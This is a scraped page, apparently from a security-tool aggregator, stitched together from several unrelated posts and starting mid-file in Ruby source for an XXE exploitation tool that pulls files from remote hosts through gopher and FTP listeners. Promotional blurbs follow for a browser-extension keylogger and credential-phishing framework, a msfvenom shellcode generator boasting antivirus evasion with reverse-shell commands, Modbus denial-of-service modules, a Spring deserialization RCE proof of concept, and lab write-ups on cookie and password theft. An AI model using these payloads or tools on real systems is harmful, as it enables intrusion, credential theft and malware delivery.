		client.close
  	  end
	end
	end
end

# gopher server to read files/directory listings and log to files
if enum == "gopher"
	Thread.start do
	loop do
 	  Thread.start(gopher.accept) do |client|
		$done = 0
		switch = 0
		puts "Response with file/directory content received. Enumeration unlocked." if $verbose == "y"
		$tmppath = $nextpath
		begin
		status = Timeout::timeout($contimeout) {
			loop {
				req = ""
				loop do
					tmp = client.gets()
					break if tmp.chomp == ""
					req += tmp
				end
	
				req.sub! 'gopher=', ''
				req.split("\n").each do |param|
	
					# logging to file
					log(param + "\n")
			
					# push to array if directory listing is detected for further enumeration
					pusharr(param)
				end
	
			}
		}
		rescue Timeout::Error
		end
		client.close
  	  end
	end
	end
end

# logger
if $logger == "y"
	puts "You can now make requests."
	puts "Enter \"exit\" to quit."
	loop do
		cmp = Readline.readline("> ", true)
		exit(1) if cmp.chomp == "exit"
	end
end

# unfiltered ports enumeration
if enumports != ""
	ports = ""

	# enumerating all ports
	if enumports == "all"
		j = 1
		while j <= 65535  do
			$dtd = "<!DOCTYPE convert [ <!ENTITY % remote SYSTEM \"http://#{host}:#{j}/success.dtd\">%remote;]>"
			begin
				Thread.start do
				loop do
				  enum = TCPServer.new j
  				  Thread.start(enum.accept) do |client|
					ports += String(j) + ","
					client.close
					break
				  end
				end
				end
				configreq()
				sendreq()
				send2ndreq() if $secfile != ""
				j = j + 1
			rescue Errno::EADDRINUSE
				puts "Cannot bind to #{j} port."
			end
		end

	# enumerating only specified ports
	else
		tports = enumports.split(",")
		tports.each do |tcpport|
			$dtd = "<!DOCTYPE convert [ <!ENTITY % remote SYSTEM \"http://#{host}:#{tcpport}/success.dtd\">%remote;]>"
			begin
				Thread.start do
				loop do
				  enum = TCPServer.new tcpport
  				  Thread.start(enum.accept) do |client|
					ports += String(tcpport) + ","
					client.close
					break
				  end
				end
				end
				configreq()
				sendreq()
				send2ndreq() if $secfile != ""
			rescue Errno::EADDRINUSE
				puts "Cannot bind to #{tcpport} port."
			end
		end
	end
	if ports != ""
		puts "Unfiltered ports: " + ports[0..-2]
	else
		puts "No unfiltered ports were identified."
	end
	exit(1)
else
	if $direct == ""
		configreq()
	end
end

# TCP server for uploading files using Java jar
if upload != ""
	Thread.start do
	loop do
  	  Thread.start(jar.accept) do |client|
		content = IO.binread(upload)
		count = 0
		puts "File uploaded. Check temp directory on remote host for jar_cache*.tmp file. This file is available until connection is closed."
		loop do
			if count == 0
				client.puts(content)
				count = 1
			end
			sleep(10000)
		end
	  end		
	end
	end
	sendreq()
	loop do
		sleep(10000)
	end
end

# TCP server for XSLT injection test
if $xslt == "y"
	test = 0
	Thread.start do
	loop do
  	  Thread.start(xsltserv.accept) do |client|
		puts "XSLT injection is working!"
		client.close
		exit(1)
	  end		
	end
	end
	sendreq()
	send2ndreq() if $secfile != ""
	sleep timeout
	puts "XSLT is not working."
	exit(1)
end

# Retriving Windows hashes
if hashes == "y"
	puts "Start msfconsole with auxiliary/server/capture/smb. Press enter when started."
	Readline.readline("> ", true)
	sendreq()
	send2ndreq() if $secfile != ""
	sleep(10)
	puts "Check msfconsole for hashes."
	Readline.readline("> ", true)
	exit(1)
end

# Sending first request
if $brute == ""
	if $direct == ""
		enumpath = $path
		switch = 1
		puts "Enumeration locked." if $verbose == "y"
		sendreq()
		send2ndreq() if $secfile != ""
	else
		$done = 0
		$directpath = $path
		configreq()
		sendreq()
		send2ndreq() if $secfile != ""
		if !$response.body.include?("#{$direct}")
			puts "Response does not contain unique mark."
			exit(1)
		else
			if $response.body.include?("#{$direct}#{$direct}")
				puts "File/directory could not be retrieved."
				exit(1)
			else
				$response.body[/(#{$direct})(.*)(#{$direct})/m].gsub("#{$direct}", "\n").split("\n").each do |param|				
					
					# log to separate file
					log(param + "\n")
					
					# push to array if directory listing is detected for further enumeration
					param = param.chomp
					if param.match $regex
						$filenames.push(param)
						puts "Path pushed to array: #{param}" if $verbose == "y"
					end

				end
			end
		end
	end

	# Loop that checks if response with next file content was received by FTP/HTTP server
	if $direct == ""
		loop do
			sleep timeout
			if switch == 1 && hashes == "n" && upload == ""
				puts "FTP/HTTP did not get response. XML parser cannot parse provided file or the application is not responsive. Wait or Next? W/n"
				cmp = Readline.readline("> ", true)
				Readline::HISTORY.push
				break if cmp == "n" || cmp == "N"
				sleep timeout
			else
				break
			end
		end
	end
end

# read, ask and further enumerate
loop do
	if $brute == ""
		if !$filenames[i].nil?
		
			# Read next line
			line = $filenames[i]
			line = line.chomp
			line = line.gsub(' ','%20')
		
			# Check if a file should be enumerated
			check = "#{$path}/#{line}".split("/")[0..-2].join('/')

			if enumall != "y" && !blacklist.include?(check) && !whitelist.include?(check)
				if $cut == 0
					if $path[-1] == "/"
						puts "Enumerate #{$path}#{line} ? Y[yes]/n[no]/s[skip all files in this directory]/a[enum all files in this directory]"
					else
						puts "Enumerate #{$path}/#{line} ? Y[yes]/n[no]/s[skip all files in this directory]/a[enum all files in this directory]"
					end
				else
					if $path == ""
						puts "Enumerate /#{line} ? Y[yes]/n[no]/s[skip all files in this directory]/a[enum all files in this directory]"
					else
						puts "Enumerate /#{$path}/#{line} ? Y[yes]/n[no]/s[skip all files in this directory]/a[enum all files in this directory]"
					end
				end
				cmp = Readline.readline("> ", true)
				Readline::HISTORY.push
				if cmp == "s" || cmp == "S"
					blacklist.push("#{$path}/#{line}".split("/")[0..-2].join('/'))
				end
				if cmp == "a" || cmp == "A"
					whitelist.push("#{$path}/#{line}".split("/")[0..-2].join('/'))
					cmp = "y"
				end
			elsif	enumall == "y" || whitelist.include?(check)
				cmp = "y"
			else 
				cmp = "n"
			end
			if cmp == "y" || cmp == "Y" || cmp == ""
				if enumall != "y" && !whitelist.include?(check)
					switch = 1
					puts "Enumeration locked." if $verbose == "y"
				end
				$nextpath = "#{line}"
	
				# Send request with next filename
				if $direct != ""
					if $path[-1] != "/"
						$directpath = "#{$path}/#{line}"
					else
						$directpath = "#{$path}#{line}"
					end
					configreq()
				else
					if $path[-1] != "/"
						enumpath = "#{$path}/#{line}"
					else
						enumpath = "#{$path}#{line}"
					end
				end
				enumpath[0] = "" if enumpath[0] == "/"
				sendreq()
				send2ndreq() if $secfile != ""

				# Loop that checks if response with next file content was received by FTP/HTTP servers
				if $direct == ""
					loop do
						sleep timeout
						if switch == 1
							puts "FTP/HTTP did not get response. XML parser cannot parse provided file or the application is not responsive. Wait or Next? W/n"
							cmp = Readline.readline("> ", true)
							Readline::HISTORY.push
							break if cmp == "n" || cmp == "N"
							sleep timeout
						else
							break
						end
					end
				else
					if not $response.body.include?("#{$direct}")
						puts "Response does not contain unique mark."
					else
						if $response.body.include?("#{$direct}#{$direct}")
							puts "File/directory could not be retrieved."
						else
							$done = 0
							$response.body[/(#{$direct})(.*)(#{$direct})/m].gsub("#{$direct}", "\n").split("\n").each do |param|				

								# log to separate file
								log(param + "\n")
					
								# push to array if directory listing is detected for further enumeration
								pusharr(param)

							end
						end
					end
				end

			end
			i = i + 1
		else
			puts "Nothing else to do. Exiting."
			exit(1)
		end
	else
		brutefile = File.open($brute, "r")
		exit(1) if IO.readlines(brutefile)[i].nil?
		
		# Read next line
		line = IO.readlines(brutefile)[i]
		line = line.chomp

		log = File.open($output, "a")
		log.write "\n"
		log.write "Filename: #{line}\n"
		log.close

		# handle unix and windows paths
		if line[0] == "/"
			line[0] = ''
			$cut = 1
		end
		line = line.gsub("\\","/")
		if line[-1] == "/" && line[-2] != ":"
			line[-1] = ''
		end
		if line[-1] == ":"
			line += '/'
		end

		line = line.gsub(' ','%20')

		# Send request with next filename
		if $direct == ""
			enumpath = "#{line}"
		else
			$directpath = "#{line}"
			configreq()
		end
		sendreq()
		send2ndreq() if $secfile != ""

		if $direct != ""
			if not $response.body.include?("#{$direct}")
				puts "Response does not contain unique mark." if $verbose == "y"
			else
				log = File.open($output, "a")
				log.write $response.body[/(#{$direct})(.*)(#{$direct})/m].gsub("#{$direct}", "\n") + "\n"
				puts "Bruteforced request logged: #{$directpath}" if $verbose == "y"
				log.close
			end
		end

		i = i + 1
		
		brutefile.close
		sleep timeout
	end
end

Source: https://github.com/enjoiz | Our post before

LynxFramework is an operating tool for web browser offering a specialized service in the effect browser extension development , namely Google Chrome and Firefox soon. The operation is based on the script for the injection in the order to retrieve data targeted.

LynxFramework:
has been tested on windows, MaxOSX, Ubuntu, And Kali 2.0

ONLINE PAYLOAD:
+ XSSKeylooger keylooger xss
+ ForceDownload force file download
+ paytoweb www.paytoweb.com
+ Paypal https://www.paypal.com/signin/
+ Facebook http://facebook.com

usage:

git clone https://github.com/graniet/LynxFramework && cd LynxFramework
python LynxFramework.py
set:payload (what do you want)
then open your chrome browser..

Source: https://github.com/graniet | https://lynxframework.com/

Changelog v1.0.9 Comodo Venom 20/1/2016:
+ venom.sh
+ template: remove templates/easy_ps1.bat, remove templates/easy_ps1.bat
+ display shellcode:

venom-sh-1-0-9

The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( c | python | ruby | dll | msi | hta-psh ), injects the shellcode generated into one funtion (example: python) “the python funtion will execute the shellcode in ram” and uses compilers like: gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recibe the remote connection (reverse shell or meterpreter session).
—
‘shellcode generator’ tool reproduces some of the technics used by Veil-Evasion framework, unicorn.py, powersploit, etc,etc,etc..”P.S. some payloads are undetectable by AV soluctions yes!!!” one of the reazons for that its the use of a funtion to execute the 2º stage of shell/meterpreter directly into targets ram.

DEPENDENCIES :
— “crisp.sh will download/install all dependencies as they are needed”
— Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe module)
— python-pip (pyinstaller downloader) | mingw32 (compile .EXE executables)
— pyherion.py (crypter) | PEScrambler.exe (PE obfuscator/scrambler.)

payload-multi-handler

Features
option – build – target – format – output
—
1 – shellcode – unix – C – C
2 – shellcode – windows – C – DLL
3 – shellcode – windows – DLL – DLL
4 – shellcode – windows – C – PYTHON/EXE
5 – shellcode – windows – C – EXE
6 – shellcode – windows – MSIEXEC – MSI
7 – shellcode – windows – C – RUBY
8 – shellcode – windows – HTA-PSH – HTA
9 – shellcode – windows – PSH-CMD – PS1
10 – shellcode – windows – PSH-CMD – BAT
11 – shellcode – webserver – PHP – PHP
12 – shellcode – multi OS – PYTHON(b64) – PYTHON
—
F – FAQ (frequent ask questions)
E – exit shellcode generator

Usage:

Download shell.tar.gz
tar xf shell.tar.gz
./venom.sh 

git clone git://git.code.sf.net/p/crisp-shellcode-generator/shell crisp-shellcode-generator-shell
cd crisp-shellcode-generator-shell
./venom.sh

UPdates:
cd cd crisp-shellcode-generator-shell
git pull

[ HOW DOES MSFVENOM ACTUALLY BUILDS SHELLCODE? ]
The default way to generate a windows binarie payload (.exe) using msfvenom its achieved through -f flag (Output format)
msfvenom -p payload-name LHOST=127.0.0.1 LPORT=666 -f exe -o payload.exe

But msfvenom allow us to build shellcode in diferent formats
like: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh
macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c
java, perl, powershell, python, ruby, sh, vbscript.
The complete list can be accessed using the follow command: sudo msfvenom --help-formats

now lets generate a simple shellcode to windows/shell/reverse_tcp
chosing powershell as output format "note that we will not use
the flag -o (Save the payload) option, this way the shellcode
generated will only displays in current terminal windows".
Using powershell as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell

Using java as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java

Using hex as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex

our post before | Download : shell.tar.gz (24 MB)
Source :http://sourceforge.net/p/crisp-shellcode-generator/

This is one off of exploit database written in c# for windows environments.

searchsploit

Requirements:
(Update Required at first use to download necessary packages) searchsploit -u or searchploit –update .Net 4.5.2
Cli menu:

searchsploit -h
  Usage: searchsploit [OPTIONS] term1 [term2] ... [termN]
Example:
  searchsploit afd windows local
  searchsploit -t oracle windows
  searchsploit --nmap NmapScan.xml

=========
 Options
=========
   -c, --case     Perform a case-sensitive search (Default is insensitive).
   -h, --help     Show this help screen.
   -t, --title    Search just the exploit title (Default is title AND the file's path).
   -u, --update   Update exploit database from git.
   -v, --verbose  Verbose output. Title lines are allowed to overflow their columns.
   -w, --www      Show URLs to Exploit-DB.com rather than local path.
       --colour   Disable colour highlighting.
       --id       Display EDB-ID value rather than local path.
       --nmap     Reads nmap's exported xml file to return vulnerabilities per host.

=======
 Notes
=======
 * Use any number of search terms, in any order.
 * Search terms are not case sensitive, and order is irrelevant.
   * Use '-c' if you wish to reduce results by case-sensitive searching.
* Use '-t' to exclude the file's path to filter the search results.
   * Could possibly remove false positives (especially when searching numbers).
 * When updating from git or displaying help, search terms will be ignored.

Usage:
download *.zip and unzip it.
right click open in your visual comunity studio
then build searchsploit.

Download : exploit-database-c-sharp.zip
Source : https://github.com/raul5660

Changelog v1.0.1:
+ Modules                                           Description
———                                                 ———–
modbus/dos/galil                              RIO DOS Galil RIO-47100
modbus/dos/writeSingleCoils         DOS With Write Single Coil Function
modbus/dos/writeSingleRegister   DOS Write Single Register Function
modbus/function/read                     ExceptionStatus Fuzzing Read Exception Status Function
modbus/sniff/arp                              Arp Poisoning

smod is a modular framework with every kind of diagnostic and offensive feature you could need in order to pentest modbus protocol. It is a full Modbus protocol implementation using Python and Scapy. This software could be run on Linux/OSX under python 2.7.x.

smod-v1-0-1

Summery
SCADA (Process Control Networks) based systems have moved from proprietary closed networks to open source solutions and TCP/IP enabled networks steadily over recent years. This has made them vulnerable to the same security vulnerabilities that face our traditional computer networks.
The Modbus/TCP protocol was used as the reference protocol to display the effectiveness of the test bed in carrying out cyber attacks on a power system protocol. Modbus/TCP was chosen specifically for these reasons:
+ modbus is still widely used in power systems.
+ modbus/TCP is simple and easy to implement.
+ modbus protocol libraries are freely available for utilities to implement smart grid applications.
You can use this tool to vulnerability assessment a modbus protocol.

Installation & usage:

git clone https://github.com/enddo/smod && cd smod
python smod.py

Update:
cd smod
git pull

Source : https://github.com/enddo | Our Post Before

Spring framework is commonly used 3rd party library used by many java server projects. If spring-tx.jar, spring-commons.jar and javax.transaction-api.jar are in your class path, and you use RMI, JMS, IIOP or any other untrusted java deserialization you are vulnerable to this RCE exploit.
Spring maintainer Pivotal rejected my report on this issue, with the argument that the problem lies in the untrusted deserialization, so this issue remains unpatched.

JtaTransactionManager
+ spring-tx.jar contains a class named org.springframework.transaction.jta.JtaTransactionManager which is vulnerable to the JNDI deserialization issue described in my last post.
+ The readObject() method ends up in a chain looking like the following initUserTransactionAndTransactionManager()->initUserTransactionAndTransactionManager()-> JndiTemplate.lookup()->InitialContext.lookup(), where the argument to the InitialContextLookup() call is userTransactionName which we are able to control.
+ All we have to do is to create JtaTransactionManager object, set the userTransactionName to a RMI string pointing back to our own RMI Registry and send the object to a vulnerable server. The RMI string would look something like “rmi://x.x.x.x:1099/Object”

Server

Client FIle

Running the PoC
To build and run the server run the following:

git clone https://github.com/zerothoughts/spring-jndi && cd spring-jndi
cd server
mvn install
java -cp “target/*” ExploitableServer 9999

Afterwards to run the client, start up a 2nd terminal:

cd client
mvn install 
java -cp “target/*” ExploitClient 127.0.0.1 9999 127.0.0.1

Source: http://zerothoughts.tumblr.com/post/137831000514/spring-framework-deserialization-rce

NOTE: This Post For Education and Security Research Only.

SecurityLab is a collection Program vulnerabilities, OpenSSL, and web app attacks.
—Explaination—
Lab1:
sploit1
The vulnerability is: strcpy() does not check the number of bits which will be copied into “char buf[96]”, so we overflow the return address of “lab_main()” and redirect the execution of the program to the shellcode we provide which runs a shell terminal.

example-sploit1 in gdb

sploit2
The vulnerability was that the len specified in the program was set to a max of 272. This allowed the attack string to overwrite i and len. The i variable was first overwritten such that it would remain small, so just the last byte of its four was overwritten with 0xb. Then len was overwritten 0x0000011c to enable i to index into buf to reach where the return address laid in memory. The environment variables were necessary to split up the attack string whenever a null byte was needed.
sploit3
The vulnerability is: “char buf[64]” is only 64 bytes, but “bar ( arg, buf, 88 )” allows us to write 88 bytes into it, therefore, we overflow the return address of “foo()” and redirect the execution of the program to the shellcode we provide which runs a shell terminal.
sploit4
Similar to sploit2, len could be set to a max of 169 and so len and i could be overwritten. The difference for sploit4 is that there is no indexing into the array using i. Thus, len first has be overwritten to allow enough iterations to overwrite i. The new value of i to be written needs to be at least such that len – i = number of iterations needed to fully overwrite all four bytes of the return address. The environment variables were necessary to split up the attack string whenever a null byte was needed.
sploit5
The vulnerability is: passing a certain number of “%x’s” to the “snprintf()” function allows us to change the argument pointer to point to the beginning of the “formatString”. At the beginning of the “formatString” we insert the location of the first 4 bytes of the return address of foo() seperated by NULL bytes. We then pass “%##u%hhn” to “snprintf()” four times to change the first 4 bytes of the return address one at a time. We then let the program continue to run, and once it returns from foo(), it will jump to the beginning of “char buf[1024]” and start executing the shellcode we inserted in there.
sploit6
The solution required two fake chunk tags. The first was located on the 8 bytes before the address of q where the double free was called and the second was placed a short distance away. The first tag’s next pointer pointed to the second fake tag. The second tag’s next pointer had the address of the return address, which was copied to the first’s next. It was then dereferenced and overwritten with a value in tmalloc.c’s “arena”, redirecting program execution. Placing the shellcode somewhere after the q region allowed a new shell to be spawned.

Lab2:
client
To build upon the sockets already in place, we used SSL, BIO, and CTX objects. The CTX object allowed the client to communicate with SSLv3 and TLSv1 only via SSLv23_method and SSL_OP_NO_SSLv2 parameter. SSL_CTX_set_cipher_list set SHA1 as the class of cipher suites to be used. SSL_get_verify_result, the CA_LIST “ece568ca.pem”, and SSL_get_peer_certificate was used to verify the certificate. Failing a SSL_connect causes the client to output errors from the BIO. X509_NAME_get_text_by_NID, X509_get_subject_name, NID_commonName, and NID_pkcs9_emailAddress was used to extract and check the common name and email from the certificate. SSL_write sent the secret and SSL_read got the server response and checked for errors, whether to continue reading, and when the server finished (closed the connection). Upon connection close, the client responds with its own SSL_shutdown. For cleanup, SSL_free and SSL_CTX_free were used. The buf had to be null terminated at the number of bytes read, otherwise unexpected garbage characters could show up.
server
It is very similar to the client. Notable differences are that there is child spawned for every client connection to try SSL_accept and output errors from the BIO if it failed. The SSL_read is done first to react to the client’s SSL_write and needs to be iterated until the secret has been completely read. The buf that stores the client’s message needs to be null-terminated at len due to possible unexpected garbage characters. Then the server does an SSL_write to give the answer to the client. The server-side shutdown is a bit different. The first SSL_shutdown will send a close_notify to the client, but not look for the client’s. Next, shutdown is called to send a TCP FIN required for certain clients and then server calls SSL_shutdown a second time.

Client-Server

Lab3:
Attack A. Cookie Theft
For this attack, we insert the “email script” javascript text after “http://zoobar.csl.toronto.edu/users.php?user=”>” so that it will be executed. It must be URL encoded or else it won’t work. The payload is set to “document.cookie” to get cookie information. We quickly reload the page to hide the errors from the user.
Attack B. Cross-Site Request Forgery
For this attack, we create a form with fields identical to the “http://zoobar.csl.toronto.edu/transfer.php” “transfer_form” and specify the transfer of 10 zoobars to “attacker” in the form. We submit the form to an <iframe> instance of “zoobar.csl.utoronto.edu” and imitate a “send” button click. Finally, we listen for when the form is submitted and quickly redirect to “http://ece568.csl.toronto.edu/”.
Attack C. Password Theft
For this attack, we create a form with fields identical to the “http://zoobar.csl.toronto.edu/login.php” “login_form” and submit it with a “special” “username.value” string. The “special” string is constructed such that its content will be evaluated and it will listen for a “Log in” button click and send the “username”,”password” using the email script. Certain sections of the string must be escaped for it to process without errors. We use “event.preventDefault();” to stop all actions until email script has been processed. We also have “image.onerror” to listen for when email script is starting to be processed, and then remove listener and click login button so that everything appears as normally would for the user.
Attack D. Profile Worm
The vulnerability is that there is an eval on document.getElementById(‘zoobars’).className. The malicious profile text consists of a span element that contains the same id ‘zoobars’ as an existing element. Since this inserted span element comes first, the eval will now be passed an arbitrary string as the class name. Two iframes are created, one to transfer 1 zoobar to the attacker and the other copies the attacker profile to the viewer profile. To set the attacker profile to appear to have 10 zoobars, the string contains “total = 10;”. This initializes total and since the later assignment to total will fail, total remains unchanged.

Lab4:
4.1
For this part, we specify the email_scope to be “email” so that we have access to the client’s email information and also the principle of least privilege is satisfied.
4.2
Before calling getPeopleInfo(), a new, similar function validateToken() is used. An XMLHttpRequest is created to get the token info for a particular access token. On a good request (status 200), the request’s responseText is parsed into JSON and the value for the audience key is compared with the client ID. If it matches, the given access token was actually for that client and getPeopleInfo() can be called to display profile information. Otherwise, no profile info is shown and the validity check is shown to have failed.
4.3
For this part, we implemented drive() to handle the authentication process. We first check if the client already has an authentication code, if not, we redirect them to the Google Login API which will prompt the client to log into their account and grant access based on the SCOPE we provide. Once the client is successfully authenticated, we retrieve the client’s credentials by providing their authentication code and store the credentials in a file locally.
4.4
Extending drive() after 4.3, the access token from credentials is applied to an Http object. A Google+ API service object is created to get the person info of the authenticated user (‘me’) and write it to profile.out. Then, a Google Drive service object is created to upload (insert) a file with the body containing specified metadata and the media_body containing profile.out.
Usage:

sudo apt-get install libx32gcc-4.8-dev
sudo apt-get install libc6-dev-i386
git clone https://github.com/hanwang92/SecurityLab && cd SecurityLab
cd Lab1 until Lab4
Compile and run one by one.. and read the note explaination inside folder

Source:https://github.com/hanwang92

Changelog Codename: Komodo Venom v1.0.10 :
FUNCTION   |   DESCRIPTION
——-                —————————————————————————
bug fix         ->  ‘getsystem’ bug fixed in all resource files (.rc)
improved    ->  terminal displays review/improved/fixed.
improved    ->  ‘elementary OS’ ip address support added (LHOST).
improved    ->  ‘@echo off’ added to all .bat files to hidde displays in terminal windows
added          ->  ‘apache2’ added to deliver your payloads using a malicious URL..
added          ->  ‘gather.rc’ post-exploitation resource file (gather target info)
added          ->   ‘SimpleHTTPServerWithupload.py’ a simplehttpserver with
download/upload capabilittys if you need it (manual run)
——-        |       —————————————————————————

Komodo Venom v1.0.10

The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( c | python | ruby | dll | msi | hta-psh ), injects the shellcode generated into one funtion (example: python) “the python funtion will execute the shellcode in ram” and uses compilers like: gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recibe the remote connection (reverse shell or meterpreter session).
—
‘shellcode generator’ tool reproduces some of the technics used by Veil-Evasion framework, unicorn.py, powersploit, etc,etc,etc..”P.S. some payloads are undetectable by AV soluctions yes!!!” one of the reazons for that its the use of a funtion to execute the 2º stage of shell/meterpreter directly into targets ram.

DEPENDENCIES :
— “crisp.sh will download/install all dependencies as they are needed”
— Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe module)
— python-pip (pyinstaller downloader) | mingw32 (compile .EXE executables)
— pyherion.py (crypter) | PEScrambler.exe (PE obfuscator/scrambler.)

Features
option – build – target – format – output
—
1 – shellcode – unix – C – C
2 – shellcode – windows – C – DLL
3 – shellcode – windows – DLL – DLL
4 – shellcode – windows – C – PYTHON/EXE
5 – shellcode – windows – C – EXE
6 – shellcode – windows – MSIEXEC – MSI
7 – shellcode – windows – C – RUBY
8 – shellcode – windows – HTA-PSH – HTA
9 – shellcode – windows – PSH-CMD – PS1
10 – shellcode – windows – PSH-CMD – BAT
11 – shellcode – webserver – PHP – PHP
12 – shellcode – multi OS – PYTHON(b64) – PYTHON
—
F – FAQ (frequent ask questions)
E – exit shellcode generator

Usage:

git clone git://git.code.sf.net/p/crisp-shellcode-generator/shell crisp-shellcode-generator-shell
cd crisp-shellcode-generator-shell
./venom.sh

Updates:
cd cd crisp-shellcode-generator-shell
git pull

[ HOW DOES MSFVENOM ACTUALLY BUILDS SHELLCODE? ]
The default way to generate a windows binarie payload (.exe) using msfvenom its achieved through -f flag (Output format)
msfvenom -p payload-name LHOST=127.0.0.1 LPORT=666 -f exe -o payload.exe

But msfvenom allow us to build shellcode in diferent formats
like: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh
macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c
java, perl, powershell, python, ruby, sh, vbscript.
The complete list can be accessed using the follow command: sudo msfvenom --help-formats

now lets generate a simple shellcode to windows/shell/reverse_tcp
chosing powershell as output format "note that we will not use
the flag -o (Save the payload) option, this way the shellcode
generated will only displays in current terminal windows".
Using powershell as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell

Using java as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java

Using hex as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex

our post before |
Source :http://sourceforge.net/p/crisp-shellcode-generator/

Changelog 25/1/2016:
+ Update ConsoleCommand.cs
+ XPloit: Process Memory dump
+ Xploit.Module: Update ProcessMemoryDump.cs
+ XPloit.sln : fix letter
+ XPloit.Core.Rfid: Fix uppercase 2/2

xploit-25-1-2016

Xploit is a Open source exploit framework made in C#

header CMD XPloit

Feature and Modules:
+ Auxiliary/Local
— Local Brute force by wordlist
— Dns Exfiltrate
— DNS-Exfiltration file parser
— DNS-Serve
— Invisible socks proxy
— NFC Restore system
— TCP Sniffer to file
— Kill a process in local machine
— Execute a system command in local machine
— Generate a wordList
+ Encoders/String ; Encode byte[] to base64 string.
+ Nops/Php ; PHP Nop
+ Payloads/Local/BruteForce
— Crack Bitlocker drive calling windows API
— Crack Bitlocker drive
— Crack MySql sniffed with WireShark Credentials

Xploit is a Open source exploit framework made in C#

How to run:

git clone https://github.com/shargon/Xploit && cd Xploit
or
download it xploit-master.zip
unzip and right click open with visul studio xxxx comunity
then build.
open folder : xploit > bin > Debug > xploit.exe

Download : xploit-master.zip | Our Post Before
Source : https://github.com/shargon